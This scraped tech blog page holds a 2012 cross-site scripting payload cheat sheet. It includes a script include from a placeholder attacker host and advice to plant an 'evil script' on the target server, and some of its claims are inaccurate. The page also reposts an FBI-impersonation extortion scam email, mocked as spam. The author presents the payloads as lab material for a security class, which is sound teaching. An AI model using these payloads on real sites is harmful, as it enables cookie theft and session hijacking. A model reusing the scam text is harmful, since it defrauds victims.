Techwag

These were compiled in September of 2012 – if you are reading this way off in the future – you will want to go back and verify that these still work.

So what types of testing can you do for Cross Site Scripting? This is a quick collection of standard Cross Site Scripting Notation from around the internet, security blogs, security sites, and some of the more interesting underground web sites out there. These are just examples of the code that you can use to do cross site scripting.

<script>alert(document.cookie);</script> this will steal someone else’s cookie or otherwise access a cookie that you might not otherwise have access to.

<SCRIPT SRC=http://YourWebSite.com/YourEvilJavaScript.js></SCRIPT>  this will inject your java script from a site you own, control, or from a java script you have successfully put on the web server you are cross site scripting. It is best to use their server for your evil script to take advantage of systems trust. Your computer might not be trusted, and that would throw some interesting errors that the client might see.

<BODY BACKGROUND=”javascript:alert(‘XSS’)”> using the body background tag to inject a script into your vulnerable system.

<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME> using an IFRAME as an injection possibility

<body onload=alert(‘test’)> loads the XSS using the body onload command

<IMG SRC=j&#X41vascript:alert(‘test’)> using an IMG tag to alert when the image loads

<script>alert(‘Xss By Your Name here’)</script> using a standard java script alert notation

SomePage.php?url=http://EvilHackerSite.com  simple redirect to a page of your choice

</script><script>alert%28document.cookie%29</script><script> nested script tags for evasion if you think the site you are looking at is protected by a Firewall or other security system

%22%3E%3Cscript%3Ealert%28%22http://st2tea.blogspot.com%22%29%3C/script%3E using UTF8 or other encoding for evasion processes.

POST: retURL=http%3A%2F%2Fwww.xssed.com%2F using the post command to redirect to a different URL than intended

POST: keywords=%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&search.x=0&search.y=0 using post to subvert the internal site search engine (all sites have a search feature unless they are horribly out of date)

There are a lot of places out there that have a lot of very good examples. These were pulled from XSSED.com and Hackers.org and CGI-Security. These are being used in my Application Hacking class at Highline Community College, in a private network, with known vulnerable software. No system was compromised in the pursuit of this knowledge. Please don’t try this at home.

Related articles

• Tumblr haunted by stored (persistent) XSS flaw
• Cve-2012-1892
• Cve-2012-2536
• XSS and SQL Injection Vulnerabilities in Jara

Sometimes you just get an awesome spam message that is too sweet not to pass up. Today I got one that simply rocks. Everything left intact, including typos, formatting, and grammar. Simply brilliant.

Anti-Terrorist and Monetary Crimes Division

Fbi Headquarters In Washington, D.C.

Federal Bureau Of Investigation

J. Edgar Hoover Building

935 Pennsylvania Avenue, NW

Washington, D.C. 20535-0001

Website: www.fbi.gov

Attention, this is the final warning you are going to receive from me do you get me?

I hope youre understand how many times this message has been sent to you?.

We have warned you so many times and you have decided to ignore our e-mails or because you believe we have not been instructed to get you arrested, and today if you  fail to respond back to us with the payment then, we would first send a letter to the mayor of the city where you reside and direct them to close your bank account  until you have been jailed and all your properties will be confiscated by the fbi. We would also send a letter to the company/agency that you are working for so that  they could get you fired until we are through with our investigations because a suspect is not suppose to be working for the government or any private organization.

Your id which we have in our database been sent to all the crimes agencies in America for them to inset you in their website as an internet fraudsters and to warn  people from having any deals with you. This would have been solved all this while if you had gotten the certificate signed, endorsed and stamped as you where  instructed in the e-mail below.this is the federal bureau of investigation (fbi) am writing in response to the e-mail you sent to us and am using this medium to  inform you that there is no more time left to waste because you have been given from the 3rd of January. As stated earlier to have the document endorsed, signed and stamped without failure and you must adhere to this directives to avoid you blaming yourself at last when we must have arrested and jailed you for life and all your  properties confiscated.

You failed to comply with our directives and that was the reason why we didn’t hear from you on the 3rd as our director has already been notified about you get the  process completed yesterday and right now the warrant of arrest has been signed against you and it will be carried out in the next 48hours as strictly signed by the  fbi director. We have investigated and found out that you didn’t have any idea when the fraudulent deal was committed with your information’s/identity and right now if      you id is placed on our website as a wanted person, i believe you know that it will be a shame to you and your entire family because after then it will be announce in  all the local channels that you are wanted by the fbi. As a good Christian and a honest man, I decided to see how i could be of help to you because i would not be happy to see you end up in jail and all your properties confiscated all because your information’s was used to carry out a fraudulent transactions, i called the efcc and they directed me to a private attorney who could help you get the process done and he stated that he will endorse, sign and stamp the document at the sum of $98.00 usd only and i believe this process is cheaper for you.

You need to do everything possible within today and tomorrow to get this process done because our director has called to inform me that the warrant of arrest has been  signed against you and once it has been approved, then the arrest will be carried out, and from our investigations we learnt that you were the person that forwarded  your identity to one impostor/fraudsters in Nigeria when he had a deal with you about the transfer of some illegal funds into your bank account which is valued at the  sum of $10.500,000.00 usd.

I pleaded on your behalf so that this agency could give you till 6/27/2012 so that you could get this process done because i learnt that you were sent several e-mail  without getting a response from you, please bear it in mind that this is the only way that i can be able to help you at this moment or you would have to face the law  and its consequences once it has befall on you. You would make the payment through western union money transfer with the below details.

NAME: VINCE DURU ADDRESS:  LAGOS  NIGERIA TEXT QUESTION:FOR ANSWER: YOU AMOUNT: $98 Senders name======

Send the payment details to me which are senders name and address, mtcn number, text question and answer used and the amount sent. Make sure that you didn’t hesitate  making the payment down to the agency by today so that they could have the certificate endorsed, signed and stamped immediately without any further delay. After all  this process has been carried out, then we would have to proceed to the bank for the transfer of your compensation funds which is valued at the sum of $10.500,000.00  usd which was suppose to have been transferred to you all this while.

Note/ all the crimes agencies have been contacted on this regards and we shall trace and arrest you if you disregard this instructions. You are given a grace today to  make the payment for the document after which your failure to do that will attract a maximum arrest and finally you will be appearing in court for act of terrorism,  money laundering and drug trafficking charges, so be warned not to try any thing funny because you are been watched.

THANKS FOR YOUR CO-OPERATION.

ROBERT MUELLER  WASHINGTON DC  Anti-Terrorist and Monetary Crimes Division  Fbi Headquarters In Washington, D.C.  Federal Bureau Of Investigation  J. Edgar Hoover Building  935 Pennsylvania Avenue, NW Washington, D.C. 20535-0001 Website: www.fbi.gov

Social Networking is facing the prospects of being deputized by the Australian Federal Police, Facebook, and other social networking sites are increasingly becoming one of the most important sources for intelligence about people. Forget neighbors talking to the police, now we are looking at our socially connected world as being involved with law enforcement.   [...]

Note: I wrote this for a client last summer who was looking at a banking industry application. The application was poorly written, and I hope that they have since fixed it. It makes an interesting concept that last summer we were talking about banking and smart phones, then to see a number of these issues [...]

These are not high level attacks, rather this falls more into the recon stage to identify specific software running on sites that are indexed by Google. The good part is that these work in Bing as well making them much more functional in terms of identifying the use of WordPress and Buddy Press where registration [...]

So much for not selling out your gang. It looks like Sabu one of the folks who has been speaking for LulzSec has been secretly working for the FBI according to multiple online reports. Lulzsec has been one of the leading hacking groups and has seriously gone after a ton of people, companies, and others [...]